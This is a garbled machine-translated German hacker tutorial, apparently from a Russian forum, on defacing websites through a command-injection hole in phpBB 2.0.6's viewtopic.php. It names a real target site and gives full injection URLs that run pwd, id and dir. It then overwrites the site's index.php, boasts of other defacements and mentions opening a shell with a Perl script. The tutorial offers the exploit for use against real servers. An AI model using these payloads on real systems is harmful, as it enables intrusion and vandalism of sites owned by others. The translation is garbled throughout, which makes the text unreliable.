This page has been robot translated, sorry for typos if any. Original content here.

Der komplette Führer verunstalten (aktualisiert)

Einführung
Oft sehe ich eine Frage auf dem Forum: „Wie Websites zu brechen“ oder „Wie zadefeysit Website?“. Heute können Sie defeysnut Portal ohne einen Tropfen Aufwand zu setzen! Alle Liebhaber von leichter Beute einzuladen! =)

Hauptteil
Heute werde ich darüber reden, wie defeysy verschiedene Standorte durch Fehler in der populären Skripte zu machen. Es wurde vor kurzem eine schwere Sicherheitslücke in der beliebten phpBB-Engine entdeckt.
Wurde eine Schwachstelle im Modul viewtopic.php entdeckt

Die Tatsache , dass ein Angreifer beliebigen PHP-Skript auf einem anfälliges System mit der Übertragungsleitung ausführen könnte , ist über die viewtopic.php? T = 1 & highlight =% 27

Wie Sie wahrscheinlich schon erraten haben, macht diese Sicherheitsanfälligkeit es möglich, beliebige Befehle beliebiger Länge auf einem anfälligen Server auszuführen. Heute verwenden wir dieses Loch, und gemeinsam mit Ihnen die bestehenden realen Server brechen. Das Ziel unserer wird nur verunstalten, also der Ersatz der Homepage auf unseren eigenen.

Also, wir gehen, wird unser Opfer www.maxmuscle.dk (zum Zeitpunkt der Veröffentlichung des Artikels Portals ist resistent gegen Schwachstellen).
Das erste, was unser Auge fällt, wenn Sie diese Seite besuchen, so ist es das, was es auf einem Portal-System PHP-Nuke basiert.

Standardmäßig ist das System nur ein Forum phpBB. Wir klicken auf einen Link, der uns zum Forum führt, (http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=index.php) und stellen Sie sicher, dass dies der phpBB 2.0.6 .

Wir passieren die Anfrage an das Forum dieser Art:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s =

und wir finden, dass der Motor die Linie geschluckt wie durch ein charakteristisches Zeichen anstelle einem Spitznamen eines der Mitglieder angegeben: „) #i“. Aber es hat nichts bedeuten, können wir leicht die Ausführung von Befehlen auf dem Server abbrechen, aber wir werden nicht spekulieren, und nur versuchen, es auszuführen:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s = PWD

Dieser Befehl (PWD) sollte uns das Verzeichnis zeigen, in der wir jetzt sind, wenn das passiert, dann kann gefolgert werden, dass die Ausführung von Befehlen auf dem Server möglich. Und so geschieht es. Pfad zu dem Verzeichnis / var / www / html / osclux / angezeigt. Der folgende Befehl sollte «id» unseren Zugang zu überprüfen.

Wie wir sehen können wir die richtige uid = 99 (nobody), dh den richtigen Web - Server haben. Jetzt zeigen wir eine Liste von Ordnern und Dateien in html_public Verzeichnis Befehl „dir / var / www / html / osclux“ und finden , dass so notwendig für uns defeysa index.php in diesem Verzeichnis ist.

Also haben wir auf der Ziellinie sind - der Befehl echo Hacked by vasya> index.php, vyvdem wir die Hauptseite die Inschrift «Hacked by vasya». Prüfen. Es geschah.

Sie haben verunstalten.

anstelle eines Schlusses
Es ist so unkompliziert war defeys hackzona.ru gehalten, so wurde es Forum nsd.ru. gebrochen Ich stellt fest, als auch, dass dies die einfachste Umsetzung dieses Loches ist, unter guten Bedingungen bestimmt Port lauscht leicht Bucht auf dem Server sein, das Skript in Perl und haben eine volle Schale mit niemandem Privilegien gewesen.